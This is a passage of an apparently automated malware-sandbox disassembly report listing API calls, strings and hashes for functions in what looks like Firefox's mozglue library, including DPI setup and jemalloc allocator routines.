                                                                                                                                                                                                                                                                                        control_flow_graph 3697 6c9c55f0-6c9c5613 LoadLibraryW * 2 3698 6c9c5619-6c9c561b 3697->3698 3699 6c9c5817-6c9c581b 3697->3699 3698->3699 3700 6c9c5621-6c9c5641 GetProcAddress * 2 3698->3700 3701 6c9c5821-6c9c582a 3699->3701 3702 6c9c5677-6c9c568a GetProcAddress 3700->3702 3703 6c9c5643-6c9c5647 3700->3703 3704 6c9c5814 3702->3704 3705 6c9c5690-6c9c56a6 GetProcAddress 3702->3705 3703->3702 3706 6c9c5649-6c9c5664 3703->3706 3704->3699 3705->3699 3707 6c9c56ac-6c9c56bf GetProcAddress 3705->3707 3706->3702 3720 6c9c5666-6c9c5672 GetProcAddress 3706->3720 3707->3699 3708 6c9c56c5-6c9c56d8 GetProcAddress 3707->3708 3708->3699 3710 6c9c56de-6c9c56f1 GetProcAddress 3708->3710 3710->3699 3712 6c9c56f7-6c9c570a GetProcAddress 3710->3712 3712->3699 3713 6c9c5710-6c9c5723 GetProcAddress 3712->3713 3713->3699 3715 6c9c5729-6c9c573c GetProcAddress 3713->3715 3715->3699 3716 6c9c5742-6c9c5755 GetProcAddress 3715->3716 3716->3699 3718 6c9c575b-6c9c576e GetProcAddress 3716->3718 3718->3699 3719 6c9c5774-6c9c5787 GetProcAddress 3718->3719 3719->3699 3721 6c9c578d-6c9c57a0 GetProcAddress 3719->3721 3720->3702 3721->3699 3722 6c9c57a2-6c9c57b5 GetProcAddress 3721->3722 3722->3699 3723 6c9c57b7-6c9c57ca GetProcAddress 3722->3723 3723->3699 3724 6c9c57cc-6c9c57e2 GetProcAddress 3723->3724 3724->3699 3725 6c9c57e4-6c9c57f7 GetProcAddress 3724->3725 3725->3699 3726 6c9c57f9-6c9c580c GetProcAddress 3725->3726 3726->3699 3727 6c9c580e-6c9c5812 3726->3727 3727->3701
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(user32,?,6C99E1A5), ref: 6C9C5606
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(gdi32,?,6C99E1A5), ref: 6C9C560F
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C9C5633
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C9C563D
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C9C566C
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C9C567D
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C9C5696
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C9C56B2
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C9C56CB
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C9C56E4
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C9C56FD
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C9C5716
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C9C572F
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C9C5748
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C9C5761
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C9C577A
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C9C5793
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C9C57A8
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C9C57BD
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C9C57D5
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C9C57EA
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C9C57FF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                        • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                                                                                                                                                                                                        • API String ID: 2238633743-1964193996
                                                                                                                                                                                                                                                                                        • Opcode ID: c478249c45f030af10dafa819abf94b017a23ed3ca62e2946fc572ccdccdfe5e
                                                                                                                                                                                                                                                                                        • Instruction ID: 707d817e7f495cb259b708155250f66a34ec8c2642faa626c07694ccf5b52fe6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c478249c45f030af10dafa819abf94b017a23ed3ca62e2946fc572ccdccdfe5e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99514370709702ABDF415F359D4493B3ABCAF7E249730846AA921E2A56EF70D800DF66
                                                                                                                                                                                                                                                                                        Function 6C9C34A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C3527
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C355B
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C35BC
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C35E0
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C363A
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C3693
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C36CD
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C3703
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C373C
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C3775
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C378F
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C3892
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C38BB
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C3902
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C3939
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C3970
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C39EF
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C3A26
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C3AE5
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C3E85
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C3EBA
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C3EE2
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9C6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C9C61DD
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9C6180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C9C622C
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C40F9
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C412F
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C4157
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9C6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C9C6250
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9C6180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9C6292
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C441B
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C4448
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C9C484E
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C9C4863
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C9C4878
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C9C4896
                                                                                                                                                                                                                                                                                        • free.MOZGLUE ref: 6C9C489F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: floor$free$malloc$memcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3842999660-3916222277
                                                                                                                                                                                                                                                                                        • Opcode ID: 712e78fc0cf5bccd93dcf7e65081610fa6e6aeb93cf5f0a14cbf66aa0cc4a44e
                                                                                                                                                                                                                                                                                        • Instruction ID: 016b069f170d1614d8ec4d2ff502f8c55f6f1cac5bc5c2f067cdeb52b3adcac6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 712e78fc0cf5bccd93dcf7e65081610fa6e6aeb93cf5f0a14cbf66aa0cc4a44e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9CF23C74A08B808FC761CF28C0846AAFBF1BF99358F118A5ED99997711DB31E495CF42
                                                                                                                                                                                                                                                                                        Function 6C9764C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C9764DF
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C9764F2
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C976505
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C976518
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C97652B
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C97671C
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C976724
                                                                                                                                                                                                                                                                                        • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C97672F
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C976759
                                                                                                                                                                                                                                                                                        • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C976764
                                                                                                                                                                                                                                                                                        • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C976A80
                                                                                                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C976ABE
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C976AD3
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C976AE8
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C976AF7
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                                                                                                                                                                                                        • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 487479824-2878602165
                                                                                                                                                                                                                                                                                        • Opcode ID: 32585ff918b024c8ace0db0fb7522ad03384dc46ac55d275918891e78fabf0f0
                                                                                                                                                                                                                                                                                        • Instruction ID: 1ebd9c1e596bd8157fed98672f2662e48bfa4f8c25f513cffeb9bf39d02dfa4f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 32585ff918b024c8ace0db0fb7522ad03384dc46ac55d275918891e78fabf0f0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2F1B1709062199FDF30CF64CC48B9AB7B9AF5A318F1442D9D859A7641E731EE84CFA0
                                                                                                                                                                                                                                                                                        Function 6C9960A0 Relevance: 50.1, APIs: 22, Strings: 6, Instructions: 1142COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EE7DC), ref: 6C9960C9
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE7DC), ref: 6C99610D
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C99618C
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C9961F9
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                        • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                                                                                                                                                        • API String ID: 3168844106-429003945
                                                                                                                                                                                                                                                                                        • Opcode ID: 5f75f4d167f9bfc6bf7e63d5cd48666383c74c2262f03865b7a26fcead0bb717
                                                                                                                                                                                                                                                                                        • Instruction ID: 2f998ff6f4689630e24fb63a5a4fa87ec09506a72b39c6ea02835af5830c453f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f75f4d167f9bfc6bf7e63d5cd48666383c74c2262f03865b7a26fcead0bb717
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6BA2AA71A097018FD748CF29C450615BBE5BF9A728F2DC66DE86A8BB91D731E840CBC1
                                                                                                                                                                                                                                                                                        Function 6C9CC4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9CC5F9
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9CC6FB
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00004008), ref: 6C9CC74D
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00004008), ref: 6C9CC7DE
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00004014), ref: 6C9CC9D5
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9CCC76
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C9CCD7A
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9CDB40
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C9CDB62
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C9CDB99
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9CDD8B
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C9CDE95
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C9CE360
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9CE432
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C9CE472
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: memset$memcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 368790112-0
                                                                                                                                                                                                                                                                                        • Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                                                                                                                                                                                                                                        • Instruction ID: 2c216d3f853127872e498182a52b53461f5855394c01305c43767d95ea88e07b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4433AF72E4021ACFCB04CF98C8806ADBBF2FF49310F298269D955AB755D731E945CB92
                                                                                                                                                                                                                                                                                        Function 6C97FD00 Relevance: 31.4, APIs: 17, Strings: 3, Instructions: 1360memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EE7B8), ref: 6C97FF81
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE7B8), ref: 6C98022D
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C980240
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EE768), ref: 6C98025B
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE768), ref: 6C98027B
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave$AllocVirtual
                                                                                                                                                                                                                                                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                                                                                                                                                        • API String ID: 618468079-3577267516
                                                                                                                                                                                                                                                                                        • Opcode ID: bff5209f1f24d3b837af5885179f1916c71004dfaee46b9b21892dd2c0d8a24c
                                                                                                                                                                                                                                                                                        • Instruction ID: 7b221d8877f1e3165e6fe206dcba36c739388148f35621d083aa014edaa9518b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bff5209f1f24d3b837af5885179f1916c71004dfaee46b9b21892dd2c0d8a24c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2BC2C371A077418FD714CF28C880716BBE5BF8A728F28CA6DE4698B795D771E841CB81
                                                                                                                                                                                                                                                                                        Function 6C9CE680 Relevance: 31.1, APIs: 22, Instructions: 3648COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,00004014), ref: 6C9CE811
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9CEAA8
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C9CEBD5
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9CEEF6
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9CF223
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C9CF322
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9D0E03
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C9D0E54
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C9D0EAE
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C9D0ED4
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: memset$memcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 368790112-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8b80cfa7d9a3fd4bd3f8c8bd01c264476a501494412d1b614835f72794a4b636
                                                                                                                                                                                                                                                                                        • Instruction ID: d58e5d8ab9321ed7b52198520c31a87bd4fa81117fa56b46f4c3302579944af9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b80cfa7d9a3fd4bd3f8c8bd01c264476a501494412d1b614835f72794a4b636
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1639C71E0065A8FCB04CFA8C8806EDFBB2FF89314F298269D855BB755D730A945CB91
                                                                                                                                                                                                                                                                                        Function 6C9A3E50 Relevance: 27.0, APIs: 13, Strings: 2, Instructions: 765COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9C7770: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C9A3E7D,?,?,?,6C9A3E7D,?,?), ref: 6C9C777C
                                                                                                                                                                                                                                                                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6C9A3F17
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C9A3F5C
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C9A3F8D
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C9A3F99
